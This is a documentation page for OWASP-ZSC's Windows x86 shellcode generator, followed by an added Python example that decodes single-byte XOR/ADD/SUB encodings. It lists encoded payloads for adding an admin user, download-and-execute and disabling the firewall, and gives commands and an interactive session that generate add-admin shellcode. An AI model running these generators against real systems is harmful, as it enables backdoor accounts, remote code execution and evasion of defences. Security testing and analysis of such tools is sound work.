Windows Shellcode

This module was created by Pratik Patel during his internship in the Google Summer of Code 2016. The module is still under development for x86, so if you encounter any issues, please submit them here: https://github.com/zscproject/OWASP-ZSC/issues

Command line Windows Shellcode

Many payloads are available on the fly for generating Windows shellcode, with or without encoding.

The main Windows shellcode payloads are:

add_admin:

Add an admin user. You must provide 2 parameters: 'username' and 'password'.

download_exec:

Download and execute a file. You must provide 2 parameters: 'url' and 'filename'.

exec:file_to_execute

Generate shellcode from a binary/executable. You must provide the location/path of the file as the parameter.

download_tofile('url','filename')

With this payload you can generate shellcode that downloads a file. It requires 2 parameters: 'url' and 'filename'.

[!] add_admin('username','password')
[+] windows_x86/add_admin/none
[+] windows_x86/add_admin/xor_random
[+] windows_x86/add_admin/add_random
[+] windows_x86/add_admin/sub_random
[+] windows_x86/add_admin/xor_yourvalue

[!] download_exec('url','filename')
[+] windows_x86/download_exec/none
[+] windows_x86/download_exec/xor_random
[+] windows_x86/download_exec/add_random
[+] windows_x86/download_exec/sub_random
[+] windows_x86/download_exec/xor_yourvalue

[!] exec('file_to_execute')
[+] windows_x86/exec/none
[+] windows_x86/exec/xor_random
[+] windows_x86/exec/add_random
[+] windows_x86/exec/sub_random
[+] windows_x86/exec/xor_yourvalue

[!] disable_firewall()
[+] windows_x86/disable_firewall/none
[+] windows_x86/disable_firewall/xor_random
[+] windows_x86/disable_firewall/add_random
[+] windows_x86/disable_firewall/sub_random
[+] windows_x86/disable_firewall/xor_yourvalue

[!] download_tofile('url','filename')
[+] windows_x86/download_tofile/none
[+] windows_x86/download_tofile/xor_random
[+] windows_x86/download_tofile/add_random
[+] windows_x86/download_tofile/sub_random
[+] windows_x86/download_tofile/xor_yourvalue

[!] create_file('filename','content')
[+] windows_x86/create_file/none
[+] windows_x86/create_file/xor_random
[+] windows_x86/create_file/add_random
[+] windows_x86/create_file/sub_random
[+] windows_x86/create_file/xor_yourvalue

[!] dir_create('directory_to_create')
[+] windows_x86/dir_create/none
[+] windows_x86/dir_create/xor_random
[+] windows_x86/dir_create/add_random
[+] windows_x86/dir_create/sub_random
[+] windows_x86/dir_create/xor_yourvalue

Interactive shell options

The Windows shellcode generator has the following features available:

zsc> shellcode
zsc/shellcode> generate
zsc/shellcode/generate> 
linux_x86    osx_x86      windows_x86  
zsc/shellcode/generate> windows_x86
zsc/shellcode/generate/windows_x86> 
add_admin         dir_create        download_exec     exec
create_file       disable_firewall  download_tofile

Generating shellcode for Windows - example

This module creates shellcode on the fly to add an admin user on a Windows x86 system. It is easy to use, either

from the command line: zsc -p windows_x86/add_admin/none -i "mary~~~password"

or from the interactive shell:

zsc> shellcode
zsc/shellcode> generate
zsc/shellcode/generate> 
linux_x86    osx_x86      windows_x86  
zsc/shellcode/generate> windows_x86
zsc/shellcode/generate/windows_x86> 
add_admin         dir_create        download_exec     exec
create_file       disable_firewall  download_tofile   
zsc/shellcode/generate/windows_x86> add_admin
zsc/shellcode/generate/windows_x86/add_admin> username&&password
username> jack
password> Mate1!

[+] username set to "jack"
[+] password set to "Mate1!"

[+] none
[+] xor_random
[+] add_random
[+] sub_random
[+] xor_yourvalue


[+] enter encode type
zsc/shellcode/generate/windows_x86/add_admin/encode_type>

As you can see, there are 4 encoding options for this shellcode; choose 'none' if you do not want to encode it:

  • [+] xor_random
  • [+] add_random
  • [+] sub_random
  • [+] xor_yourvalue
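The following added example (not ZSC project code) shows the defender's view of these encoders. Since the page does not document how ZSC's encoders work internally, it assumes the simplest single-byte-key form of XOR, ADD and SUB over a constructed sample, and demonstrates that such an encoding changes the byte signature of a payload but is undone by trying all 256 keys against a few known plaintext bytes.

```python
"""Analyst-side decoder for single-byte XOR / ADD / SUB encoded blobs.

Added example, not part of OWASP-ZSC. Assumption: each encoder applies one
key byte to every payload byte; the real ZSC encoders are not documented here.
"""
from itertools import product

# Constructed sample standing in for a payload an analyst wants to recover.
SAMPLE_PLAINTEXT = b"\x90\x31\xc0\x50" + b"constructed-sample-payload"

# Forward transforms, as a model of xor_*/add_*/sub_* encoding.
ENCODERS = {
    "xor": lambda b, k: (b ^ k) & 0xFF,
    "add": lambda b, k: (b + k) & 0xFF,
    "sub": lambda b, k: (b - k) & 0xFF,
}
# Inverse of each transform, used to undo the encoding.
DECODERS = {
    "xor": lambda b, k: (b ^ k) & 0xFF,
    "add": lambda b, k: (b - k) & 0xFF,
    "sub": lambda b, k: (b + k) & 0xFF,
}


def encode(data: bytes, scheme: str, key: int) -> bytes:
    """Encode every byte with the given scheme and single-byte key."""
    return bytes(ENCODERS[scheme](b, key) for b in data)


def decode(data: bytes, scheme: str, key: int) -> bytes:
    """Reverse encode() for a known scheme and key."""
    return bytes(DECODERS[scheme](b, key) for b in data)


def recover(encoded: bytes, known_prefix: bytes):
    """Try all 3 schemes x 256 keys; return (scheme, key, plaintext) for every
    combination whose decoding starts with known_prefix (the key space is so
    small that a few known bytes pin it down)."""
    hits = []
    for scheme, key in product(DECODERS, range(256)):
        if decode(encoded[:len(known_prefix)], scheme, key) == known_prefix:
            hits.append((scheme, key, decode(encoded, scheme, key)))
    return hits


if __name__ == "__main__":
    blob = encode(SAMPLE_PLAINTEXT, "xor", 0x41)   # model of xor_yourvalue 0x41
    print("signature changed:", blob != SAMPLE_PLAINTEXT)
    for scheme, key, plain in recover(blob, SAMPLE_PLAINTEXT[:4]):
        print(f"{scheme} key=0x{key:02x} recovered={plain == SAMPLE_PLAINTEXT}")
```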
